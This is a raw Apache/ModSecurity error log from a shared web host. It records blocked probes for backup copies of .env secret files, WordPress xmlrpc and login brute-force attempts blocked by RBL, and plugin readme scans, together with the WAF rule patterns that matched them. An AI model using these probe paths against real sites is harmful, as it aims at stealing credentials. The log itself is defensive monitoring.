[Tue May 26 14:04:05.677502 2026] [security2:error] [pid 578581:tid 578761] [client 208.84.100.197:22258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.copy"] [unique_id "ahVa_Zm_8al1sb-umPt57gAAADI"]
[Tue May 26 14:04:06.889279 2026] [security2:error] [pid 578581:tid 578796] [client 208.84.100.197:22606] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local~"] [unique_id "ahVa_pm_8al1sb-umPt6JAAAAFU"]
[Tue May 26 14:04:06.889285 2026] [security2:error] [pid 578581:tid 578825] [client 208.84.100.197:22670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.swp"] [unique_id "ahVa_pm_8al1sb-umPt6IwAAAHI"]
[Tue May 26 14:04:06.889341 2026] [security2:error] [pid 578581:tid 578762] [client 208.84.100.197:22556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.orig"] [unique_id "ahVa_pm_8al1sb-umPt6FQAAADM"]
[Tue May 26 14:04:06.889451 2026] [security2:error] [pid 578581:tid 578717] [client 208.84.100.197:22508] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.backup"] [unique_id "ahVa_pm_8al1sb-umPt6EwAAAAY"]
[Tue May 26 14:04:06.889450 2026] [security2:error] [pid 578581:tid 578774] [client 208.84.100.197:22676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.orig"] [unique_id "ahVa_pm_8al1sb-umPt6HwAAAD8"]
[Tue May 26 14:04:06.889476 2026] [security2:error] [pid 578581:tid 578752] [client 208.84.100.197:22578] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.backup"] [unique_id "ahVa_pm_8al1sb-umPt6EQAAACk"]
[Tue May 26 14:04:06.889511 2026] [security2:error] [pid 578581:tid 578831] [client 208.84.100.197:22648] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.bak"] [unique_id "ahVa_pm_8al1sb-umPt6IQAAAHg"]
[Tue May 26 14:04:06.890144 2026] [security2:error] [pid 578581:tid 578720] [client 208.84.100.197:22500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.old"] [unique_id "ahVa_pm_8al1sb-umPt6GQAAAAk"]
[Tue May 26 14:04:06.890168 2026] [security2:error] [pid 578581:tid 578805] [client 208.84.100.197:22664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production~"] [unique_id "ahVa_pm_8al1sb-umPt6IgAAAF4"]
[Tue May 26 14:04:06.890172 2026] [security2:error] [pid 578581:tid 578767] [client 208.84.100.197:22562] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.copy"] [unique_id "ahVa_pm_8al1sb-umPt6GAAAADg"]
[Tue May 26 14:04:06.890258 2026] [security2:error] [pid 578581:tid 578765] [client 208.84.100.197:22568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.old"] [unique_id "ahVa_pm_8al1sb-umPt6GgAAADY"]
[Tue May 26 14:04:06.890460 2026] [security2:error] [pid 578581:tid 578799] [client 208.84.100.197:22528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env~"] [unique_id "ahVa_pm_8al1sb-umPt6FwAAAFg"]
[Tue May 26 14:04:06.890781 2026] [security2:error] [pid 578581:tid 578715] [client 208.84.100.197:22626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.orig"] [unique_id "ahVa_pm_8al1sb-umPt6JgAAAAQ"]
[Tue May 26 14:04:06.890803 2026] [security2:error] [pid 578581:tid 578806] [client 208.84.100.197:22652] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.old"] [unique_id "ahVa_pm_8al1sb-umPt6IAAAAF8"]
[Tue May 26 14:04:06.890808 2026] [security2:error] [pid 578581:tid 578835] [client 208.84.100.197:22618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.swp"] [unique_id "ahVa_pm_8al1sb-umPt6JQAAAHw"]
[Tue May 26 14:04:06.891424 2026] [security2:error] [pid 578581:tid 578810] [client 208.84.100.197:22564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.bak"] [unique_id "ahVa_pm_8al1sb-umPt6GwAAAGM"]
[Tue May 26 14:04:06.892112 2026] [security2:error] [pid 578581:tid 578754] [client 208.84.100.197:22658] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.backup"] [unique_id "ahVa_pm_8al1sb-umPt6HQAAACs"]
[Tue May 26 14:04:06.893551 2026] [security2:error] [pid 578581:tid 578755] [client 208.84.100.197:22640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.copy"] [unique_id "ahVa_pm_8al1sb-umPt6KAAAACw"]
[Tue May 26 14:04:06.907727 2026] [security2:error] [pid 578581:tid 578736] [client 208.84.100.197:22474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.bak"] [unique_id "ahVa_pm_8al1sb-umPt6KQAAABk"]
[Tue May 26 14:04:06.907820 2026] [security2:error] [pid 578581:tid 578746] [client 208.84.100.197:22496] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.swp"] [unique_id "ahVa_pm_8al1sb-umPt6KgAAACM"]
[Tue May 26 14:04:07.423992 2026] [security2:error] [pid 578581:tid 578749] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa_5m_8al1sb-umPt6LwAAACY"]
[Tue May 26 14:04:07.477409 2026] [security2:error] [pid 578581:tid 578714] [client 202.141.30.10:35437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa_5m_8al1sb-umPt6OwAAAAM"]
[Tue May 26 14:04:07.477533 2026] [security2:error] [pid 578581:tid 578714] [client 202.141.30.10:35437] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa_5m_8al1sb-umPt6OwAAAAM"]
[Tue May 26 14:04:07.548886 2026] [security2:error] [pid 578581:tid 578737] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa_5m_8al1sb-umPt6MwAAABo"]
[Tue May 26 14:04:09.351993 2026] [security2:error] [pid 578581:tid 578729] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbAJm_8al1sb-umPt6dwAAABI"]
[Tue May 26 14:04:10.467937 2026] [security2:error] [pid 578581:tid 578825] [client 213.188.94.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbAJm_8al1sb-umPt6cgAAAHI"]
[Tue May 26 14:04:11.096969 2026] [security2:error] [pid 578581:tid 578715] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbApm_8al1sb-umPt6rAAAAAQ"]
[Tue May 26 14:04:13.649235 2026] [security2:error] [pid 578581:tid 578757] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbBZm_8al1sb-umPt69gAAAC4"]
[Tue May 26 14:04:15.940202 2026] [security2:error] [pid 578581:tid 578821] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbB5m_8al1sb-umPt7PQAAAG4"]
[Tue May 26 14:04:17.246142 2026] [security2:error] [pid 578581:tid 578765] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbCJm_8al1sb-umPt7WwAAADY"]
[Tue May 26 14:04:18.123765 2026] [ssl:error] [pid 578581:tid 578789] [client 13.219.121.241:22750] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname mail.consola.co provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:04:18.312129 2026] [security2:error] [pid 578581:tid 578738] [client 202.141.30.10:65426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbCpm_8al1sb-umPt7hwAAABs"]
[Tue May 26 14:04:18.312276 2026] [security2:error] [pid 578581:tid 578738] [client 202.141.30.10:65426] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbCpm_8al1sb-umPt7hwAAABs"]
[Tue May 26 14:04:18.890537 2026] [security2:error] [pid 578581:tid 578774] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbCpm_8al1sb-umPt7kQAAAD8"]
[Tue May 26 14:04:20.677909 2026] [security2:error] [pid 578581:tid 578736] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbDJm_8al1sb-umPt7wQAAABk"]
[Tue May 26 14:04:22.647249 2026] [security2:error] [pid 578581:tid 578795] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbDpm_8al1sb-umPt8CAAAAFQ"]
[Tue May 26 14:04:24.555291 2026] [security2:error] [pid 578581:tid 578720] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbEJm_8al1sb-umPt8PgAAAAk"]
[Tue May 26 14:04:26.189966 2026] [security2:error] [pid 578581:tid 578776] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbEZm_8al1sb-umPt8cAAAAEE"]
[Tue May 26 14:04:26.643127 2026] [proxy:error] [pid 578581:tid 578722] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:04:26.643180 2026] [proxy_http:error] [pid 578581:tid 578722] [client 198.235.24.75:58316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:04:26.643872 2026] [proxy:error] [pid 578581:tid 578722] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:04:26.643919 2026] [proxy_http:error] [pid 578581:tid 578722] [client 198.235.24.75:58316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:04:28.100281 2026] [security2:error] [pid 578581:tid 578745] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbE5m_8al1sb-umPt8twAAACI"]
[Tue May 26 14:04:28.444524 2026] [security2:error] [pid 578581:tid 578811] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVbFJm_8al1sb-umPt80gAAAGQ"]
[Tue May 26 14:04:29.526688 2026] [security2:error] [pid 578581:tid 578810] [client 202.141.30.10:35440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbFZm_8al1sb-umPt88gAAAGM"]
[Tue May 26 14:04:29.526852 2026] [security2:error] [pid 578581:tid 578810] [client 202.141.30.10:35440] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbFZm_8al1sb-umPt88gAAAGM"]
[Tue May 26 14:04:30.035590 2026] [security2:error] [pid 578581:tid 578743] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbFZm_8al1sb-umPt89QAAACA"]
[Tue May 26 14:04:30.263994 2026] [security2:error] [pid 578581:tid 578604] [remote 209.42.20.53:37360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVbFpm_8al1sb-umPt9AgAAVhY"]
[Tue May 26 14:04:31.712404 2026] [security2:error] [pid 578581:tid 578774] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbF5m_8al1sb-umPt9KAAAAD8"]
[Tue May 26 14:04:33.670354 2026] [security2:error] [pid 578581:tid 578737] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbGZm_8al1sb-umPt9XgAAABo"]
[Tue May 26 14:04:34.897964 2026] [security2:error] [pid 578581:tid 578607] [remote 103.95.119.103:46940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVbGpm_8al1sb-umPt9kAAAGRk"]
[Tue May 26 14:04:35.310730 2026] [security2:error] [pid 578581:tid 578821] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbGpm_8al1sb-umPt9mAAAAG4"]
[Tue May 26 14:04:36.488920 2026] [security2:error] [pid 578581:tid 578676] [remote 106.63.26.22:0] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "bigpapaairbnbhotel.com"] [uri "/wp-content/plugins/google-site-kit/readme.txt"] [unique_id "ahVbHJm_8al1sb-umPt9xgAAJV4"]
[Tue May 26 14:04:37.093305 2026] [security2:error] [pid 578581:tid 578753] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbHJm_8al1sb-umPt9zAAAACo"]
[Tue May 26 14:04:37.231767 2026] [security2:error] [pid 578581:tid 578624] [remote 57.141.2.3:61734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVbHZm_8al1sb-umPt93AAAXio"]
[Tue May 26 14:04:38.826425 2026] [security2:error] [pid 578581:tid 578738] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbHpm_8al1sb-umPt-AwAAABs"]
[Tue May 26 14:04:40.302549 2026] [security2:error] [pid 578581:tid 578682] [remote 106.63.26.14:0] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "bigpapaairbnbhotel.com"] [uri "/wp-content/plugins/*\\",\\"/readme.txt"] [unique_id "ahVbIJm_8al1sb-umPt-PgAAF2Q"]
[Tue May 26 14:04:40.324437 2026] [security2:error] [pid 578581:tid 578835] [client 202.141.30.10:35571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbIJm_8al1sb-umPt-PwAAAHw"]
[Tue May 26 14:04:40.324935 2026] [security2:error] [pid 578581:tid 578835] [client 202.141.30.10:35571] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbIJm_8al1sb-umPt-PwAAAHw"]
[Tue May 26 14:04:40.918400 2026] [security2:error] [pid 578581:tid 578725] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbIJm_8al1sb-umPt-SQAAAA4"]
[Tue May 26 14:04:42.524035 2026] [security2:error] [pid 578581:tid 578810] [client 106.63.26.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVbIZm_8al1sb-umPt-cgAAYyc"]
[Tue May 26 14:04:42.787172 2026] [security2:error] [pid 578581:tid 578807] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbIpm_8al1sb-umPt-fwAAAGA"]
[Tue May 26 14:04:42.819254 2026] [security2:error] [pid 578581:tid 578636] [remote 84.247.181.196:55076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVbIpm_8al1sb-umPt-hwAAYjY"]
